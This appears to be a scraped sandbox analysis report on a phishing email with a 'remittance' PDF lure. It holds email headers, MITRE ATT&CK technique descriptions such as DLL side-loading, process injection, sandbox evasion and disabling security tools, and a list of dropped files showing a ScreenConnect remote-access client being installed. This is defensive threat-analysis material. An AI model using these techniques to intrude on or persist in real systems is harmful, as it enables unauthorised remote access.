QINFc2x9CYqki8yC3g4vR15SjCmI0EPNExFssLgGc1tn4MYEpznbVwRVNqxyW/L/kx6gnqN7JCWGM2xbyR+AZ9aziUzUzgmmRAT6rMqr3QYxEWG6crDgtr6IseHjHFnOFFeUpD96jL+4LaaFdO5JxAObUZOB8TjH3ktsIkp1cwD3vKCan8edDkikw1zQMM4qyakL/1dyL7/knXejl0Afjagq2cBV0L2EAaxfVyZF0mYsqFwTViSrA1ThNxUpFu1nMQFVchMOVHZm09RTjGh33gNi7Ody2L+dcooKNbj5Y0n55rW1u2bwgik2NYpRzAonnpAbVB4e5EcCbppsRuarqRKCXZqqZcvMxTrSMEEfvUzQu7OVK/sg6gqRSUDE5lDR55hScKkRXrFjra+3bE19nt2LxoNdxeIlRmyUH/IaRe0HcXuDYsSWRHkf302r41jbNqIua5+5ldCkM8YiCetNqaONDi0otW6lwW4t3d16PWhomklt4vyO+aZpw2TKsJxnebZEKl1s2ZRGse55lZWXyEQUnG0z3LcrW7ez74ucpIZkbkiDytYTSQ5YuTSlxllT8Gu+nasFyN6GWUb8dqjEuvYG8wZ/SfM7cBM4CsrLXQ/Q6Eo98YneAgaZJ1FN05Zas/T0Etq8Va5qSZdQeQVxGAmHWVeQVBBr01oewb2mIju7szfVXQ5qlaSSkclddAHhhZ1+/rVr0t80p96fko5EErzY4aTdTgTy4p3t0ksN4+jV1EtXfVrQs1pPN9SHMkFeJkIghbBXNTCMgiwlM+9xJZFAgzSEqtymWv1iubmJ/N1xoPWCsEKeDd15kl884dDQPMArCZspScMFDMKOG0FT7H9N6Jl7bOo=
acceptlanguage	en-US
x-ms-exchange-organization-originalclientipaddress	165.212.64.87
x-ms-exchange-organization-originalserveripaddress	10.167.242.164
X-Priority	3
X-MSMail-Priority	Normal
Message-ID	<c016ba7cd192416db98e6a9ed2a05826@thearbagroup.com>
From	Daniel Wintner <danielw@thearbagroup.com>
To	Daniel Wintner <danielw@thearbagroup.com>
Subject	Completed: Please Review Remittance eDocument_PrintScan_1962.pdf
Date	Thu, 16 Jan 2025 04:57:06 -0800
MIME-Version	1.0
Content-type	Multipart/alternative; charset="windows-1252"; boundary="00B0FEED_message_boundary"
Content-Description	Multipart message

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system. References to various COM objects are stored in the Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

LLM Input / Output

Created / dropped Files

C:\Config.Msi\49dfbf.rbs

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\Client.Override.en-US.resources

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\Client.Override.resources

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\Client.en-US.resources

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\Client.resources

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe.config

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\app.config

C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\system.config

C:\Users\user\AppData\Local\Temp\MSID83C.tmp

C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\CustomAction.config

C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.Compression.Cab.dll

C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.Compression.dll

C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll

C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.WindowsInstaller.dll

Windows Analysis Report
phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre